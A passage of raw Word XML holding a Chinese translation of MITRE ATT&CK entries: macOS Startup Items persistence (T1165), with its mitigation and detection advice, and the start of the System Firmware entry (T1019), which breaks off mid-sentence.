        <w:spacing w:after="312"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>启动项</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="1560" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="8176"/>
      </w:tblGrid>
      <w:tr w:rsidR="000F2665" w14:paraId="762A4E25" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8176" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="06D699E6" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00DD4D6D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00DD4D6D">
              <w:t>编号：</w:t>
            </w:r>
            <w:r w:rsidRPr="00DD4D6D">
              <w:t xml:space="preserve"> T1165</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="71DAC306" w14:textId="49C157E5" w:rsidR="000F2665" w:rsidRPr="00DD4D6D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:t>技术</w:t>
            </w:r>
            <w:r w:rsidRPr="00DD4D6D">
              <w:t>：</w:t>
            </w:r>
            <w:r w:rsidRPr="00DD4D6D">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="00680B04">
              <w:t>持久化</w:t>
            </w:r>
            <w:r w:rsidRPr="00DD4D6D">
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r w:rsidR="00DE009F">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>权限升级</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7078BF67" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00DD4D6D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00DD4D6D">
              <w:t>平台：</w:t>
            </w:r>
            <w:r w:rsidRPr="00DD4D6D">
              <w:t xml:space="preserve"> macOS</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6353C6EE" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00DD4D6D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00DD4D6D">
              <w:t>所需权限：</w:t>
            </w:r>
            <w:r w:rsidRPr="00DD4D6D">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00DD4D6D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>管理员</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="200383B0" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00DD4D6D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00DD4D6D">
              <w:t>有效权限</w:t>
            </w:r>
            <w:r w:rsidRPr="00DD4D6D">
              <w:t>: root</w:t>
            </w:r>
            <w:r w:rsidRPr="00DD4D6D">
              <w:t>用户</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="41DFA7A4" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00DD4D6D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00DD4D6D">
              <w:t>数据源：</w:t>
            </w:r>
            <w:r w:rsidRPr="00DD4D6D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>文件监控，进程监控</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3C2F1AF7" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00DD4D6D">
              <w:t>版本：</w:t>
            </w:r>
            <w:r w:rsidRPr="00DD4D6D">
              <w:t xml:space="preserve"> 1.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5004C82B" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="afd"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="312"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="39434C"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="627FF4A8" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>根据</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t xml:space="preserve"> Apple </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>的文档，启动项目在启动过程的最后阶段执行，并包含</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t xml:space="preserve"> shell </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>脚本或其他可执行文件，以及系统用于确定所有启动项目的执行顺序的配置信息</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>从技术上讲，这是一个弃用的版本（被启动守护程序取代），因此相应的文件夹，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
        </w:rPr>
        <w:t>/Library/StartupItems</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>在默认情况下不能保证存在于系统上，但默认情况下在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t xml:space="preserve"> macOS Sierra </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>上确实存在。启动项是一个目录，其可执行和配置属性列表</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>plist</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
        </w:rPr>
        <w:t>StartupParameters.plist</w:t>
      </w:r>
      <w:r w:rsidRPr="00487D05">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>驻留在顶级目录中。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61D9C578" w14:textId="3A04BE85" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>攻击者可以在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>启动项</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>目录中创建相应的文件夹</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>文件，以注册其自己的持久性机制。此外，由于启动项在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t xml:space="preserve"> macOS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>的启动阶段运行，它们将作为根运行。如果攻击者能够修改现有的启动项目，那么他们也将能够</w:t>
      </w:r>
      <w:r w:rsidR="00DE009F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>权限升级</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A7970C5" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00487D05" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="afd"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="312"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="39434C"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1FE83027" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
        <w:spacing w:after="312"/>
      </w:pPr>
      <w:r>
        <w:t>缓解</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2294"/>
        <w:gridCol w:w="7442"/>
      </w:tblGrid>
      <w:tr w:rsidR="000F2665" w:rsidRPr="00FF6876" w14:paraId="75BBB13D" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:trPr>
          <w:trHeight w:val="353"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2294" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="298C01F0" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00FF6876" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableHeading"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00FF6876">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
                <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
              </w:rPr>
              <w:t>缓解方法</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7442" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="7B332FBF" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00FF6876" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableHeading"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00FF6876">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
                <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000F2665" w14:paraId="3FBE56A9" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2294" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3C8B5EEE" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica"/>
                <w:color w:val="39434C"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>限制文件</w:t>
            </w:r>
            <w:r>
              <w:t>和目录权限</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7442" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="49C5AE59" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica"/>
                <w:color w:val="39434C"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="39434C"/>
                <w:lang w:val="zh-Hans"/>
              </w:rPr>
              <w:t>由于启动项已弃用，因此阻止所有用户写入</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="HTML"/>
                <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
                <w:color w:val="000000"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
                <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
              </w:rPr>
              <w:t>/Library/StartupItems</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="39434C"/>
                <w:lang w:val="zh-Hans"/>
              </w:rPr>
              <w:t>目录将阻止任何启动项注册</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
                <w:color w:val="39434C"/>
              </w:rPr>
              <w:t>。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000F2665" w14:paraId="7046C07C" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2294" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="040F726E" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica"/>
                <w:color w:val="39434C"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>用户账户</w:t>
            </w:r>
            <w:r>
              <w:t>管理</w:t>
            </w:r>
            <w:hyperlink r:id="rId81" w:history="1"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7442" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5FA5A20D" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica"/>
                <w:color w:val="39434C"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="39434C"/>
                <w:lang w:val="zh-Hans"/>
              </w:rPr>
              <w:t>应用适当的权限，以便只有特定用户才能编辑启动项目，以便可以利用这些项目进行权限提升</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
                <w:color w:val="39434C"/>
              </w:rPr>
              <w:t>。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6553473C" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
        <w:spacing w:after="312"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>检测</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46E0C21B" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="003C544D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003C544D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>可以</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>监控</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
        </w:rPr>
        <w:t>/Library/StartupItems</w:t>
      </w:r>
      <w:r w:rsidRPr="003C544D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>文件夹的更改。同样，应对照白名单检查实际使用此机制执行的程序。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>监控</w:t>
      </w:r>
      <w:r w:rsidRPr="003C544D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>启动过程中执行的进程，以检查异常或未知的应用程序和行为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37836292" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:after="312"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>系统固件</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="1560" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="8176"/>
      </w:tblGrid>
      <w:tr w:rsidR="000F2665" w14:paraId="0F2CBF46" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8176" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="46694FEF" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="005E3800" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="005E3800">
              <w:t>编号：</w:t>
            </w:r>
            <w:r w:rsidRPr="005E3800">
              <w:t xml:space="preserve"> T1019</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="512C55F2" w14:textId="08730B6A" w:rsidR="000F2665" w:rsidRPr="005E3800" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:t>技术</w:t>
            </w:r>
            <w:r w:rsidRPr="005E3800">
              <w:t>：</w:t>
            </w:r>
            <w:r w:rsidRPr="005E3800">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="00680B04">
              <w:t>持久化</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2CEA01C0" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="005E3800" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="005E3800">
              <w:t>平台：</w:t>
            </w:r>
            <w:r w:rsidRPr="005E3800">
              <w:t xml:space="preserve"> Windows</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2851FE9D" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="005E3800" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="005E3800">
              <w:t>所需权限：</w:t>
            </w:r>
            <w:r w:rsidRPr="005E3800">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="005E3800">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>管理员</w:t>
            </w:r>
            <w:r w:rsidRPr="005E3800">
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r w:rsidRPr="005E3800">
              <w:t>系统</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6CA19B08" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="005E3800" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="005E3800">
              <w:t>数据源：</w:t>
            </w:r>
            <w:r w:rsidRPr="005E3800">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="005E3800">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>API</w:t>
            </w:r>
            <w:r w:rsidRPr="005E3800">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>监控</w:t>
            </w:r>
            <w:r w:rsidRPr="005E3800">
              <w:t>, BIOS, EFI</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0EC5857C" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="005E3800" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="005E3800">
              <w:t>CAPEC</w:t>
            </w:r>
            <w:r w:rsidRPr="005E3800">
              <w:t>编号</w:t>
            </w:r>
            <w:r w:rsidRPr="005E3800">
              <w:t xml:space="preserve">: </w:t>
            </w:r>
            <w:hyperlink r:id="rId82" w:tgtFrame="_blank" w:history="1">
              <w:r w:rsidRPr="005E3800">
                <w:t>CAPEC-532</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
          <w:p w14:paraId="4A9E9806" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="005E3800" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="005E3800">
              <w:t>贡献者</w:t>
            </w:r>
            <w:r w:rsidRPr="005E3800">
              <w:t>: Ryan Becwar; McAfee</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="413AFDF0" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="005E3800" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:t>版本：</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> 1.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="42B2A72A" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665"/>
    <w:p w14:paraId="5AC3BBB7" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>BIOS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>（基本输入</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>输出系统）和统一可扩展固件接口</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>UEFI</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>或可扩展固件接口</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
